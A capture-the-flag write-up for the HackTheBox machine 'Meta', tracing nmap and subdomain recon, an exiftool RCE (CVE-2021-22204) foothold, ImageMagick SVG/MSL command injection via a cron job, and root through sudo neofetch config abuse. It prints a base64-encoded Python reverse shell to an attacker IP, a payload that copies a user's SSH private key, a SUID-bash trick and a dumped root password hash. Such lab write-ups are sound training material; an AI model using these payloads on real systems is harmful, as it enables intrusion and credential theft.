CTF-Writeups/HackTheBox/Meta.md

HackTheBox-Meta

NMAP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

When visiting the site it resovles to domain name artcorp.htb , so add this to hosts file

So running to fuzz for files and directories using dirsearch

It didn't found anything interesting , since we have a domain name , we can fuzz for a subdomain using wfuzz

Now adding this to hosts file as well

Now here it's reading metdata from the image file with extension png or jpeg/jpg , I tried uploading a normal php file which the server responded with file not allowed

So let's try to add a comment which will have a php command into a legit png file

When we upload this to the site , it will remove this php comment

Foothold

For this there's a CVE (CVE-2021-22204)

We can find the POC as well

https://github.com/OneSecCyber/JPEG_RCE

Clone the repo and use the eval.config file

exiftool -config eval.config image.png -eval='system("id")'

On uploading it you'll see the out of the command in system

To get a reverse shell we can use python3 to reverse shell payload and to not run into problem quotes problem I base64 encoded the payload so bash doesn't scream about double qutoes and single quotes

exiftool -config eval.config image.png -eval='system("echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjEyNSIsMjIyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTtvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKSc=' | base64 -d |bash")'

Start the listener and upload the file

After getting the shell , stabilize it with python3, checking sudo -l and other directories I wasn't able to find anything that could allow us to privesc to thomas user, so transfered pspy to monitor background processes and found that there was a cron job running as thomas

Privilege Escalation (Thomas)

If we check the script which is being ran as thomas we can see that it's running mogrify , luckily this has an exploit which has command injection

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

So what script is actually doing is naviagting to convert_images in web directory and there it's running mogrify to convert image files to png format so we need to place our svg paylod there

<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/uwu`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

After waiting for a minute for cron job to run the script

This will output the contents of thoma's ssh key in shm folder in a file named uwu , now just login through ssh

Privilege Escalation (root)

Running sudo -l it shows that we can run neofetch as the root user

Here we can see that env_reset is used which means that we can't really exploit PATH variable to replace any command being ran in neofetch but there's env_keep+=XDG_CONFIG_HOME which allows us to use this variable for root user

Launching neofetch with default config

Here we see that it's using the defaut configuration file , now about the env_keep we can abuse neofetch by loading a config file , copy the config file from thomas's directory because the cron job will be replacing thie config file so avoid this we can create a folder neofetch and put the config file there

Now make a change to the default config to see if we are able to load a custom config file

sudo XDG_CONFIG_HOME=/home/thomas /usr/bin/neofetch

And this time it loads neofetch with showing users so it did work

Let's try to add a bash command in the config file , it could be any command so I am checking if it can make bash a SUID so we can get root

After running it we can see that bash has SUID bit on

And with this we got root

References

• https://hackerone.com/reports/1154542
• https://github.com/OneSecCyber/JPEG_RCE
• https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
• https://blog.adithyanak.com/oscp-preparation-guide/linux-privilege-escalation/sudo-abuse

root:$6$C2RdQ0RpQ545cx/2$TMbXaoMwVs7XQVOwEwAnzcUVrIR5CdpVaM3Aoml8p9PWQWvxbrGrh/Y6d2.OuKlSHVsNVS0mJwSoGl.q8Pbug0:18996:0:99999:7:::